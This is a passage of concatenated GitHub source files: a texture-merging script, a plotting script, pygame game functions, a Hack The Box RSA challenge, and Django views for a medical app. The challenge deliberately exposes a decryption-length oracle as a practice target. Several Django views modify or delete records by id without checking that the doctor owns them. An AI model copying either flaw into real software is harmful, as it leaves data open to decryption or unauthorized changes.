any(matkeyword in matinst for matkeyword in matkeywords):\n            images[key][Match.group('TEXTYPE')] = imagesDir + '/' + filename\n            meshes[key] = mesh\n        else:\n            print(\"WARNING - no matching keyword found in TGA texture file\")\n            continue\n    else:\n        continue\n
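\n# After the scan above, the two dicts map \"material instance + GUID\" keys to\n# the exported maps, e.g. (values illustrative, GUID shortened to E226...):\n#   images['_MI_Knife1_E226...']['BaseColor'] == 'Work/T_M_SM_Knife1_MI_Knife1_E226..._BaseColor.TGA'\n#   meshes['_MI_Knife1_E226...'] == 'SM_Knife1'\n\nfor texkey in images.keys():\n    print(\"\\nProcessing Texture %s\" % texkey)\n    mixsuffix = ''\n    for imgtype in images[texkey].keys():\n        print(\"Processing %s (%s)\" % (images[texkey][imgtype],imgtype))\n        try:\n            imbase = Image.open(images[texkey][imgtype])\n        except:\n            print(\"Could not open image '%s'\" % images[texkey][imgtype])\n            sys.exit(1)\n        # Resize image - e.g. 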
roughness might be 1x1 only on export, if all\n # values are identical (optimization by UE4 baking process)\n width, height = imbase.size\n if width == 1:\n print(\"Resizing %s - %s\" % (texkey, imgtype))\n imbase = imbase.resize((texsize, texsize))\n # Diffuse and Normal are just saved to PNG without processing\n if imgtype == 'BaseColor' or imgtype == 'Normal':\n outfile = '{:s}/T_{:s}{:s}_{:s}.png'.format(imagesDir,\n meshes[texkey],\n texkey,\n suffixes[imgtype])\n print(\"Saving %s to %s\" % (imgtype,outfile))\n imbase.save(outfile)\n continue\n # All others are processed to be combined into a single texture map\n mixsuffix += suffixes[imgtype]\n if imgtype == 'Roughness':\n RR, RG, RB = imbase.split()\n elif imgtype == 'Metallic':\n MR, MG, MB = imbase.split()\n # Share red channel used for AO on leather sheath for specular on\n # solo knife, where it is used for blood\n elif imgtype == 'AmbientOcclusion' or imgtype == 'Specular':\n OR, OG, OB = imbase.split()\n else:\n print(\"Cannot handle image type %s\" % imgtype)\n \n # merge color channels\n # default roughness 0.5 for Knife: 188 (0.737) is correct sRGB for 0.5\n # all others: RED channel not used or AO - default is 0 (0.0)\n # NOTE: UE4 generated baked textures are all sRGB, even roughness etc.\n # which normally should have disabled sRGB.\n if 'Knife' in texkey:\n mergeimage = Image.new('RGB', (texsize, texsize), (188, 0, 0))\n else:\n mergeimage = Image.new('RGB', (texsize, texsize), (0, 0, 0))\n Xr, Xg, Xb = mergeimage.split()\n if 'R' in mixsuffix:\n Xg = RG\n if 'M' in mixsuffix:\n Xb = MB\n if 'O' in mixsuffix or 'S' in mixsuffix:\n Xr = OR\n\n img_final = Image.merge('RGB', (Xr, Xg, Xb))\n outfile = '{:s}/T_{:s}{:s}_{:s}.png'.format(imagesDir,\n meshes[texkey],\n texkey,\n mixsuffix)\n print(\"Saving %s map to %s\" % (mixsuffix, outfile))\n img_final.save(outfile)\n \nsys.exit(0)","repo_name":"herb64/TexJoiner","sub_path":"TexJoiner.py","file_name":"TexJoiner.py","file_ext":"py","file_size_in_byte":7015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4032393975","text":"import argparse\nimport os\nimport json\nimport logging\nimport pprint\nimport re\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import rcParams\nfrom utils import bd\nfrom glob import glob\n\nfrom utils.matplotlib_utils import default_rc_params, linestyles_cycle, markers_cycle, load_rc_params, set_lims\n\nlogging.basicConfig(\n level=logging.INFO,\n format='%(asctime)s.%(msecs)03d %(levelname)s %(module)s - %(funcName)s: %(message)s',\n datefmt=\"%Y-%m-%d %H:%M:%S\")\nlogger = logging.getLogger(__name__)\n\nx_col = 'pos_bits_per_input_point'\nrcParams = default_rc_params(rcParams)\n\n\ndef read_json(file):\n with open(file, 'r') as f:\n return json.load(f)\n\n\ndef build_curves(data, ylabel, column, filename, output_path, ylim=None, xlim=None, legend_loc='lower right',\n no_legend=False, lims=None):\n logger.info(f'Building curves with {ylabel}')\n\n data = [d.copy() for d in data]\n for d in data:\n d['reports'] = d['reports'].copy()\n fig, ax = plt.subplots()\n\n markers = markers_cycle()\n linestyles = linestyles_cycle()\n for d, marker, linestyle in zip(data, markers, linestyles):\n d['marker'] = marker\n d['linestyle'] = linestyle\n\n data_summary = []\n for d in data:\n df = d['reports']\n df['finite_mask'] = np.isfinite(df[column].values)\n logger.debug(f'{column} {df}')\n # if not np.all(data_finite):\n # data_lossless = 
cur_data[~data_finite]\n # data_lossless_bpp = np.min(data_lossless[:, 0])\n # ax.axvline(x=data_lossless_bpp, label='_nolegend_', linestyle=data['linestyle'])\n\n df_finite = df[df['finite_mask']]\n ax.plot(df_finite[x_col], df_finite[column],\n label=d['label'], linestyle=d['linestyle'], marker=d['marker'])\n\n for _, row in df_finite.iterrows():\n data_summary.append({'mode_id': d['mode_id'], 'label': d['label'], 'metric': column,\n 'ylabel': ylabel, 'x': row[x_col], 'y': row[column]})\n\n pd.DataFrame(data_summary).to_csv(os.path.join(output_path, filename + '_data.csv'))\n\n ax.set(xlabel='bits per input point', ylabel=ylabel)\n ax.set_xlim(left=0)\n set_lims(ax, lims)\n if not no_legend:\n ax.legend(loc=legend_loc)\n ax.locator_params(axis='x', nbins=6)\n ax.locator_params(axis='y', nbins=6)\n ax.grid(True)\n if xlim is not None:\n ax.set_xlim(xlim)\n if ylim is not None:\n ax.set_ylim(ylim)\n\n fig.tight_layout()\n for ext in ['.pdf', '.png']:\n fig.savefig(os.path.join(output_path, filename + ext))\n\n message = ''\n for bdf, bdname in zip((bd.bdrate, bd.bdsnr), ('bdrate', 'bdsnr')):\n bddf = [{'metric': column, 'mode_id': d['mode_id'], 'label': d['label']} for d in data]\n\n for i, d1 in enumerate(data):\n for j, d2 in enumerate(data):\n df1 = d1['reports']\n df1 = df1.query('bd_mask and finite_mask')\n df2 = d2['reports']\n df2 = df2.query('bd_mask and finite_mask')\n bd_result = bdf(df2[[x_col, column]].values, df1[[x_col, column]].values)\n bddf[i][d2['mode_id']] = bd_result\n bddf = pd.DataFrame(bddf)\n\n bd_str = bddf.to_string()\n message += bd_str + '\\n'\n print(bd_str)\n bddf.to_csv(os.path.join(output_path, filename + '_' + bdname + '.csv'))\n with open(os.path.join(output_path, filename + '.log'), 'w') as f:\n f.write(message)\n\n\ndef run(paths, patterns, labels, mode_ids, output_path, output_prefix, path_filter=None, modes=('d1', 'd2'),\n bd_ignore=(), no_legend=False, lims=None):\n for path in paths:\n assert os.path.exists(path), f'{path} does not exist'\n\n data = [{'reports': [{'path': gpath} for gpath in glob(os.path.join(path, pattern), recursive=True)],\n 'path': path, 'pattern': pattern, 'label': label.replace('_', ' '), 'mode_id': mode_id}\n for path, pattern, label, mode_id in zip(paths, patterns, labels, mode_ids)]\n\n # Filtering paths and data\n filtered_data = []\n for d in data:\n if path_filter is not None:\n regexp = re.compile(path_filter)\n filtered_reports = []\n else:\n filtered_reports = d['reports']\n for report in d['reports']:\n path = report['path']\n if path_filter is not None:\n mask_value = regexp.search(report)\n if not mask_value:\n logger.info(f'Ignoring {report}')\n else:\n filtered_reports.append(report)\n bd_mask_value = not any(bdi in path for bdi in bd_ignore)\n report['bd_mask'] = bd_mask_value\n if not bd_mask_value:\n logger.info(f'Ignoring {path} for BD computations')\n\n if len(filtered_reports) == 0:\n logger.info(f'Ignoring {d[\"path\"]} {d[\"pattern\"]}')\n else:\n d['reports'] = filtered_reports\n filtered_data.append(d)\n data = filtered_data\n\n for d in data:\n reports = d['reports']\n logger.info(f'reports: {reports}')\n for i in range(len(reports)):\n report = reports[i]\n json_data = read_json(report['path'])\n rkeys = set(report.keys())\n jkeys = set(json_data.keys())\n assert len(rkeys.intersection(jkeys)) == 0, f'Key conflict rkeys {rkeys} jkeys {jkeys}'\n report = {**report, **json_data}\n reports[i] = report\n reports = pd.DataFrame(data=reports)\n d['reports'] = reports.sort_values(by=x_col)\n\n curves = {\n 
'd1': (output_prefix + 'rd_curve_d1', 'd1_psnr', 'D1 PSNR (dB)', 'lower right'),\n        'd2': (output_prefix + 'rd_curve_d2', 'd2_psnr', 'D2 PSNR (dB)', 'lower right')\n    }\n    curves = [curves[m] for m in modes]\n\n    for (filename, column, ylabel, legend_loc) in curves:\n        build_curves(data, ylabel, column, filename, output_path, legend_loc=legend_loc, no_legend=no_legend,\n                     lims=lims)\n\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser(prog='ev_compare.py', description='Gathers reports and produces summary.',\n                                     formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n    parser.add_argument('--paths', help='Input paths.', nargs='+', required=True)\n    parser.add_argument('--patterns', help='Search patterns (ex: **/report.json).', nargs='+', required=True)\n    parser.add_argument('--labels', help='Labels.', nargs='+', required=True)\n    parser.add_argument('--mode_ids', help='Identifiers.', nargs='+', required=True)\n    parser.add_argument('--output_path', help='Output directory path.', required=True)\n    parser.add_argument('--output_prefix', help='Prefix for output files.', default='')\n    parser.add_argument('--path_filter', help='Path based result filtering.')\n    parser.add_argument('--modes', help='Modes to use for output: d1, d2 or both.', default=['d1', 'd2'], nargs='+')\n    parser.add_argument('--rcParams', help='Dictionary of parameters to pass to rcParams (JSON format).', type=json.loads)\n    parser.add_argument('--bd_ignore', help='Ignore certain reports (usually to make BD metrics comparable).', nargs='+')\n    parser.add_argument('--no_legend', help='Remove legend.', default=False, action='store_true')\n    parser.add_argument('--lims', help='xmin xmax ymin ymax. None for auto.', nargs='+')\n    args = parser.parse_args()\n    lims = args.lims\n    if lims is not None:\n        lims = [None if x == 'None' else float(x) for x in lims]\n\n    if args.rcParams is not None:\n        logger.info('Loaded rcParams configuration')\n        pprint.pprint(args.rcParams)\n        rcParams = load_rc_params(args.rcParams, rcParams)\n\n    run(args.paths, args.patterns, args.labels, args.mode_ids, args.output_path, args.output_prefix, args.path_filter,\n        args.modes, args.bd_ignore, args.no_legend, lims)\n","repo_name":"mauriceqch/pcc_geo_cnn_v2","sub_path":"src/ev_compare.py","file_name":"ev_compare.py","file_ext":"py","file_size_in_byte":7985,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"31"} +{"seq_id":"74490154647","text":"import sys\nfrom pygame import *\nfrom bullet import Bullet\n\n\ndef check_keydown_events(event, ship, screen, bullets):\n    if event.key == K_RIGHT:\n        ship.moving_right = True\n    elif event.key == K_LEFT:\n        ship.moving_left = True\n    elif event.key == K_SPACE:\n        # create a bullet and add it to the bullets group\n        new_bullet = Bullet(screen, ship)\n        bullets.add(new_bullet)\n\n\ndef check_keyup_events(event, ship):\n    if event.key == K_RIGHT:\n        ship.moving_right = False\n    elif event.key == K_LEFT:\n        ship.moving_left = False\n\n\ndef check_events(ship, screen, bullets):\n    for i in event.get():\n        if i.type == QUIT:\n            sys.exit()\n        elif i.type == KEYDOWN:\n            check_keydown_events(i, ship, screen, bullets)\n        elif i.type == KEYUP:\n            check_keyup_events(i, ship)\n\n\ndef update_screen(settings, screen, ship, bullets):\n    '''Updates the image on the screen and displays the new screen'''\n    screen.fill(settings.bg_color)\n    for bullet in bullets.sprites():\n        bullet.draw_bullet()\n    ship.blitme()\n\n    # display the last frame drawn\n    
display.flip()\n","repo_name":"GreatRaksin/battleShip","sub_path":"game_functions.py","file_name":"game_functions.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2063125767","text":"import os\nimport math\nfrom Crypto.Util.number import *\nfrom cryptography.hazmat.primitives.asymmetric import rsa\n\ndef get_length(pt):\n\tres = 0\n\tif (len(bin(pt)) - 2) % 8 != 0:\n\t\tres += 1\n\tres += (len(bin(pt)) - 2) // 8\n\treturn res\n\ndef ceil(a, b):\n\treturn -(-a // b)\n\nclass RSA:\n\tdef __init__(self, size):\n\n\t\tself.e = 0x10001\n\t\tself.size = size\n\n\t\tpriv = rsa.generate_private_key(\n\t\t public_exponent=self.e,\n\t\t key_size=size\n\t\t)\n\t\tpub = priv.public_key()\n\n\n\t\tself.n = pub.public_numbers().n\n\n\n\t\tself.d = priv.private_numbers().d\n\t\tself.n_size = ceil(self.size, 8)\n\t\tself.B = 2**((self.n_size-1)*8)\n\n\n\tdef pad(self, pt):\n\t\tres = 0x02 << 8 * (self.n_size - 2)\n\t\trandom_pad = os.urandom(self.n_size - 3 - get_length(pt))\n\t\tfor idx, val in enumerate(random_pad):\n\t\t\tif val == 0:\n\t\t\t\tval = 1\n\t\t\tres += val << (len(random_pad) - idx + get_length(pt)) * 8\n\t\tres += pt\n\t\treturn res\n\n\tdef encrypt(self,pt):\n\t\tpt = bytes_to_long(pt)\n\t\tpadded_pt = self.pad(pt)\n\t\tct = pow(padded_pt, self.e, self.n)\n\t\treturn long_to_bytes(ct).hex()\n\n\tdef decrypt(self,ct):\n\t\tct = bytes_to_long(ct)\n\t\tpt = pow(ct, self.d, self.n)\n\t\treturn pt\n\n\ndef main():\n\tFLAG = b'HTB{dummyflag}'\n\tsize = 1024\n\ttmp = RSA(size)\n\tflag = tmp.encrypt(FLAG)\n\twhile True:\n\t\ttry:\n\t\t\tprint('Please choose:\\n'+\\\n\t\t\t\t\t\t'1. Get public key.\\n'+\\\n\t\t\t\t\t\t'2. Get encrypted flag.\\n'+\\\n\t\t\t\t\t\t'3. Get length.\\n'+\\\n\t\t\t\t\t\t'> ')\n\t\t\topt = input()\n\n\t\t\tif opt == '1':\n\t\t\t\tpub_key = (hex(tmp.n)[2:], hex(tmp.e)[2:])\n\t\t\t\tprint('(n,e): ' + str(pub_key) + '\\n')\n\t\t\telif opt == '2':\n\t\t\t\tprint('Encrypted text: ' + flag + '\\n')\n\t\t\telif opt == '3':\n\t\t\t\tprint('Provide a ciphertext:\\n'+\\\n\t\t\t\t\t\t\t'> ')\n\t\t\t\tct = input()\n\t\t\t\tct = bytes.fromhex(ct)\n\t\t\t\tpt = tmp.decrypt(ct)\n\t\t\t\tlength = get_length(pt)\n\t\t\t\tprint('Length: ' + str(length) + '\\n')\n\t\t\telse:\n\t\t\t\tprint('Wrong option!\\n')\n\t\t\t\texit(1)\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\t\t\tprint('Invalid Input. 
Exit!')\n\t\t\texit(1)\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"apehex/ctf","sub_path":"hackthebox/challenges/crypto/oracle-leaks/sources/chall.py","file_name":"chall.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"21125409867","text":"from django.http import Http404\nfrom django.contrib.auth import authenticate\nfrom rest_framework import status, generics\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework.decorators import api_view\nfrom rest_framework.pagination import PageNumberPagination\nfrom rest_framework_simplejwt.tokens import RefreshToken\nfrom exercise.serializers import ExerciseSerializer, ExerciseCreateSerializer\nfrom exercise.models import Exercise\nfrom patient.serializers import PatientSerializer, PatientCreateSerializer\nfrom patient.models import Patient\nfrom session.serializers import SessionSerializer\nfrom session.models import Session\nfrom prescription.models import Prescription\nfrom prescription.serializers import PrescriptionSerializer\nfrom utils.auth import (\n get_doctor_from_token,\n)\nfrom .serializers import DoctorLoginSerializer, DoctorSerializer\nfrom .models import Doctor\n\n\nclass DoctorLoginView(APIView):\n serializer_class = DoctorLoginSerializer\n pagination_class = PageNumberPagination\n\n def post(self, request):\n username = request.data.get(\"username\")\n password = request.data.get(\"password\")\n user = authenticate(username=username, password=password)\n doctors = Doctor.objects.filter(user=user)\n patient = Patient.objects.filter(user=user)\n if len(doctors) > 0:\n refresh = RefreshToken.for_user(user)\n return Response(\n {\n \"refresh\": str(refresh),\n \"access\": str(refresh.access_token),\n \"user_id\": user.id,\n \"is_doctor\": True,\n }\n )\n elif len(patient) > 0:\n refresh = RefreshToken.for_user(user)\n return Response(\n {\n \"refresh\": str(refresh),\n \"access\": str(refresh.access_token),\n \"user_id\": user.id,\n \"is_doctor\": False,\n }\n )\n else:\n return Response(\n {\"error\": \"Invalid credentials\"}, status=status.HTTP_401_UNAUTHORIZED\n )\n\n\n@api_view([\"GET\", \"PATCH\", \"POST\", \"DELETE\"])\ndef doctor_profile(request):\n doctor = get_doctor_from_token(request)\n if isinstance(doctor, Doctor) is False:\n return doctor\n\n if request.method == \"GET\":\n serializer = DoctorSerializer(doctor)\n return Response(serializer.data)\n\n if request.method == \"POST\":\n serializer = DoctorSerializer(doctor, data=request.data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n if request.method == \"PATCH\":\n return Response(\n {\"error\": \"Use POST method to update your profile.\"},\n status=status.HTTP_405_METHOD_NOT_ALLOWED,\n )\n\n if request.method == \"DELETE\":\n doctor.delete()\n return Response(\n {\"message\": \"Profile deleted successfully.\"}, status=status.HTTP_200_OK\n )\n\n\nclass DoctorPatients(generics.RetrieveAPIView):\n queryset = Doctor.objects.all()\n serializer_class = DoctorSerializer\n pagination_class = PageNumberPagination\n\n def get(self, request, *args, **kwargs):\n doctor = get_doctor_from_token(request)\n if isinstance(doctor, Doctor) is False:\n return doctor\n if isinstance(doctor, Doctor):\n patients = doctor.patients.all()\n serializer = PatientSerializer(patients, many=True)\n 
return Response(serializer.data)\n else:\n return Response({\"error\": \"permission denied\"})\n\n\nclass DoctorPatientDetails(generics.RetrieveUpdateDestroyAPIView):\n \"\"\"\n API endpoint that allows a doctor to retrieve, update or delete a patient's details.\n \"\"\"\n\n queryset = Patient.objects.all()\n serializer_class = PatientSerializer\n pagination_class = PageNumberPagination\n\n def get(self, request, *args, **kwargs):\n \"\"\"\n Retrieve a patient's details.\n \"\"\"\n doctor = get_doctor_from_token(request)\n if isinstance(doctor, Doctor) is False:\n return doctor\n if isinstance(doctor, Doctor):\n try:\n sessions = Patient.objects.filter(\n patient__doctor=doctor, id=kwargs[\"pk\"]\n )\n sessions = sessions[0]\n serializer = PatientSerializer(sessions)\n return Response(serializer.data)\n except Patient.DoesNotExist:\n raise Http404\n else:\n return Response({\"error\": \"permission denied\"})\n\n def put(self, request, pk):\n \"\"\"\n Update a patient's details.\n \"\"\"\n doctor = get_doctor_from_token(request)\n if not isinstance(doctor, Doctor):\n return doctor\n session = Patient.objects.get(id=pk)\n serializer = PatientSerializer(session, data=request.data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk):\n \"\"\"\n Delete a patient's details.\n \"\"\"\n doctor = get_doctor_from_token(request)\n if not isinstance(doctor, Doctor):\n return doctor\n try:\n session = Patient.objects.get(id=pk)\n session.delete()\n return Response(\n {\"message\": \"Patient deleted successfully.\"},\n status=status.HTTP_200_OK,\n )\n except Patient.DoesNotExist:\n raise Http404\n\n\nclass DoctorMe(generics.RetrieveAPIView):\n \"\"\"\n API endpoint that allows a doctor to retrieve their own details.\n \"\"\"\n\n serializer_class = DoctorSerializer\n\n def get(self, request):\n \"\"\"\n Retrieve a doctor's own details.\n \"\"\"\n doctor = get_doctor_from_token(request)\n if not isinstance(doctor, Doctor):\n return doctor\n serializer = DoctorSerializer(doctor)\n return Response(serializer.data)\n\n\nclass AddSession(generics.RetrieveAPIView):\n \"\"\"\n API endpoint that allows a doctor to add a session.\n \"\"\"\n\n serializer_class = SessionSerializer\n\n def post(self, request):\n \"\"\"\n Add a session.\n \"\"\"\n doctor = get_doctor_from_token(request)\n if not isinstance(doctor, Doctor):\n return doctor\n serializer = SessionSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass DoctorSessions(generics.RetrieveAPIView):\n \"\"\"\n API endpoint that allows a doctor to retrieve their own sessions.\n \"\"\"\n\n queryset = Session.objects.all()\n serializer_class = SessionSerializer\n pagination_class = PageNumberPagination\n\n def get(self, request, *args, **kwargs):\n \"\"\"\n Retrieve a doctor's own sessions.\n \"\"\"\n doctor = get_doctor_from_token(request)\n if not isinstance(doctor, Doctor):\n return doctor\n sessions = Session.objects.filter(patient__doctor=doctor)\n serializer = SessionSerializer(sessions, many=True)\n return Response(serializer.data)\n\n\nclass DoctorSessionsDetails(generics.RetrieveUpdateDestroyAPIView):\n \"\"\"\n API endpoint that allows a doctor to retrieve, update or delete a session.\n \"\"\"\n\n queryset = Session.objects.all()\n serializer_class = 
SessionSerializer\n pagination_class = PageNumberPagination\n\n def get(self, request, pk):\n \"\"\"\n Retrieve a session.\n \"\"\"\n doctor = get_doctor_from_token(request)\n if not isinstance(doctor, Doctor):\n return doctor\n try:\n sessions = Session.objects.filter(patient__doctor=doctor, id=pk)\n sessions = sessions[0]\n serializer = SessionSerializer(sessions)\n return Response(serializer.data)\n except Session.DoesNotExist:\n raise Http404\n\n def patch(self, request, pk):\n \"\"\"\n Update a session.\n \"\"\"\n doctor = get_doctor_from_token(request)\n if not isinstance(doctor, Doctor):\n return doctor\n session = Session.objects.get(id=pk)\n serializer = SessionSerializer(session, data=request.data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk):\n \"\"\"\n Delete a session.\n \"\"\"\n doctor = get_doctor_from_token(request)\n if not isinstance(doctor, Doctor):\n return doctor\n try:\n session = Session.objects.get(id=pk)\n session.delete()\n return Response(\n {\"message\": \"Session deleted successfully.\"},\n status=status.HTTP_200_OK,\n )\n except Session.DoesNotExist:\n raise Http404\n\n\nclass DoctorExercises(generics.RetrieveAPIView):\n pagination_class = PageNumberPagination\n queryset = Exercise.objects.all()\n serializer_class = ExerciseSerializer\n\n def get(self, request):\n doctor = get_doctor_from_token(request)\n if not isinstance(doctor, Doctor):\n return doctor\n exercise = Exercise.objects.filter(owner=doctor)\n serializer = ExerciseSerializer(exercise, many=True)\n return Response(serializer.data)\n\n\nclass DoctorExerciseDetails(generics.RetrieveUpdateDestroyAPIView):\n \"\"\"\n API endpoint that allows a doctor to retrieve, update, or delete an exercise.\n\n get:\n Retrieve an exercise instance.\n\n patch:\n Update an exercise instance.\n\n delete:\n Delete an exercise instance.\n \"\"\"\n\n pagination_class = PageNumberPagination\n queryset = Exercise.objects.all()\n serializer_class = ExerciseSerializer\n\n def get(self, request, *args, **kwargs):\n \"\"\"\n Retrieve an exercise instance.\n\n Args:\n request: The HTTP request.\n args: Additional arguments.\n kwargs: Additional keyword arguments.\n\n Returns:\n A Response object containing the serialized exercise instance.\n \"\"\"\n doctor = get_doctor_from_token(request)\n if isinstance(doctor, Doctor) is False:\n return doctor\n if isinstance(doctor, Doctor):\n exercise = Exercise.objects.filter(owner=doctor, id=kwargs[\"pk\"])\n if len(exercise) == 0:\n return Response({\"error\": \"permission denied\"})\n exercise = exercise[0]\n serializer = ExerciseSerializer(exercise)\n return Response(serializer.data)\n else:\n return Response({\"error\": \"permission denied\"})\n\n def patch(self, request, *args, **kwargs):\n \"\"\"\n Update an exercise instance.\n\n Args:\n request: The HTTP request.\n args: Additional arguments.\n kwargs: Additional keyword arguments.\n\n Returns:\n A Response object containing the serialized exercise instance if the update is successful,\n or a Response object containing the errors if the update is unsuccessful.\n \"\"\"\n doctor = get_doctor_from_token(request)\n if isinstance(doctor, Doctor) is False:\n return doctor\n if isinstance(doctor, Doctor):\n exercise = Exercise.objects.get(id=kwargs[\"pk\"])\n serializer = ExerciseSerializer(exercise, data=request.data, partial=True)\n if serializer.is_valid():\n 
serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n else:\n return Response({\"error\": \"permission denied\"})\n\n def delete(self, request, *args, **kwargs):\n \"\"\"\n Delete an exercise instance.\n\n Args:\n request: The HTTP request.\n args: Additional arguments.\n kwargs: Additional keyword arguments.\n\n Returns:\n A Response object containing a success message if the deletion is successful,\n or a Http404 exception if the exercise instance does not exist.\n \"\"\"\n doctor = get_doctor_from_token(request)\n if isinstance(doctor, Doctor) is False:\n return doctor\n if isinstance(doctor, Doctor):\n try:\n exercise = Exercise.objects.get(id=kwargs[\"pk\"])\n exercise.delete()\n\n return Response(\n {\"message\": \"exercise deleted successfully.\"},\n status=status.HTTP_200_OK,\n )\n except Exercise.DoesNotExist:\n raise Http404\n else:\n return Response({\"error\": \"permission denied\"})\n\n\nclass AddPatient(generics.CreateAPIView):\n serializer_class = PatientSerializer\n\n def post(self, request):\n doctor = get_doctor_from_token(request)\n if isinstance(doctor, Doctor):\n request.data[\"doctor\"] = doctor.id\n serializer = PatientCreateSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n patient = Patient.objects.get(phone_number=serializer.data[\"phone_number\"])\n print(patient,'-----------------------')\n return Response(PatientSerializer(patient).data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n else:\n return Response({\"error\": \"permission denied\"})\n\n\nclass AddExercise(generics.CreateAPIView):\n \"\"\"\n API endpoint to add a new exercise for a doctor.\n\n Methods:\n --------\n post(request):\n Add a new exercise for the authenticated doctor.\n\n Attributes:\n -----------\n serializer_class: ExerciseCreateSerializer\n Serializer class for creating a new exercise.\n \"\"\"\n\n serializer_class = ExerciseCreateSerializer\n\n def post(self, request):\n \"\"\"\n Add a new exercise for the authenticated doctor.\n\n Parameters:\n -----------\n request: Request\n HTTP request object.\n\n Returns:\n --------\n Response:\n HTTP response object.\n \"\"\"\n doctor = get_doctor_from_token(request)\n if isinstance(doctor, Doctor):\n request.data[\"owner\"] = doctor.id\n serializer = ExerciseSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n else:\n return Response({\"error\": \"permission denied\"})\n\n\nclass SessionDate(generics.RetrieveAPIView):\n \"\"\"\n API endpoint that returns all sessions for a specific date for a doctor's patients.\n\n Args:\n request (HttpRequest): The HTTP request object.\n date (str): The date for which sessions are to be retrieved.\n\n Returns:\n Response: A JSON response containing the serialized session data.\n \"\"\"\n\n serializer_class = SessionSerializer\n\n def get(self, request, *args, **kwargs):\n doctor = get_doctor_from_token(request)\n if isinstance(doctor, Doctor):\n sessions = Session.objects.filter(\n patient__doctor=doctor, date=kwargs[\"date\"]\n )\n serializer = SessionSerializer(sessions, many=True)\n return Response(serializer.data)\n else:\n return Response({\"error\": \"permission denied\"})\n\nclass AddPrescription(generics.CreateAPIView):\n serializer_class = PrescriptionSerializer\n\n def post(self, request):\n doctor = get_doctor_from_token(request)\n if 
isinstance(doctor, Doctor):\n serializer = PrescriptionSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n else:\n return Response({\"error\": \"permission denied\"})\n\n\nclass DoctorPrescriptionDetails(generics.RetrieveUpdateDestroyAPIView):\n \"\"\"\n API endpoint that allows a doctor to retrieve, update, or delete an Prescription.\n\n get:\n Retrieve an Prescription instance.\n\n patch:\n Update an Prescription instance.\n\n delete:\n Delete an Prescription instance.\n \"\"\"\n\n pagination_class = PageNumberPagination\n queryset = Prescription.objects.all()\n serializer_class = PrescriptionSerializer\n\n def get(self, request, *args, **kwargs):\n \"\"\"\n Retrieve an prescription instance.\n\n Args:\n request: The HTTP request.\n args: Additional arguments.\n kwargs: Additional keyword arguments.\n\n Returns:\n A Response object containing the serialized prescription instance.\n \"\"\"\n doctor = get_doctor_from_token(request)\n if isinstance(doctor, Doctor) is False:\n return doctor\n if isinstance(doctor, Doctor):\n prescription = Prescription.objects.filter(owner=doctor, id=kwargs[\"pk\"])\n if len(prescription) == 0:\n return Response({\"error\": \"permission denied\"})\n prescription = prescription[0]\n serializer = PrescriptionSerializer(prescription)\n return Response(serializer.data)\n else:\n return Response({\"error\": \"permission denied\"})\n\n def patch(self, request, *args, **kwargs):\n \"\"\"\n Update an Prescription instance.\n\n Args:\n request: The HTTP request.\n args: Additional arguments.\n kwargs: Additional keyword arguments.\n\n Returns:\n A Response object containing the serialized Prescription instance if the update is successful,\n or a Response object containing the errors if the update is unsuccessful.\n \"\"\"\n doctor = get_doctor_from_token(request)\n if isinstance(doctor, Doctor) is False:\n return doctor\n if isinstance(doctor, Doctor):\n prescription = Prescription.objects.get(id=kwargs[\"pk\"])\n serializer = PrescriptionSerializer(prescription, data=request.data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n else:\n return Response({\"error\": \"permission denied\"})\n\n def delete(self, request, *args, **kwargs):\n \"\"\"\n Delete an Prescription instance.\n\n Args:\n request: The HTTP request.\n args: Additional arguments.\n kwargs: Additional keyword arguments.\n\n Returns:\n A Response object containing a success message if the deletion is successful,\n or a Http404 exception if the Prescription instance does not exist.\n \"\"\"\n doctor = get_doctor_from_token(request)\n if isinstance(doctor, Doctor) is False:\n return doctor\n if isinstance(doctor, Doctor):\n try:\n prescription = Prescription.objects.get(id=kwargs[\"pk\"])\n prescription.delete()\n\n return Response(\n {\"message\": \"prescription deleted successfully.\"},\n status=status.HTTP_200_OK,\n )\n except Prescription.DoesNotExist:\n raise Http404\n else:\n return Response({\"error\": \"permission denied\"})\n","repo_name":"MohammadrezaAmani/ThritaTech","sub_path":"doctor/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":20044,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"71825121367","text":"from ..models import Block\r\nfrom ..models import 
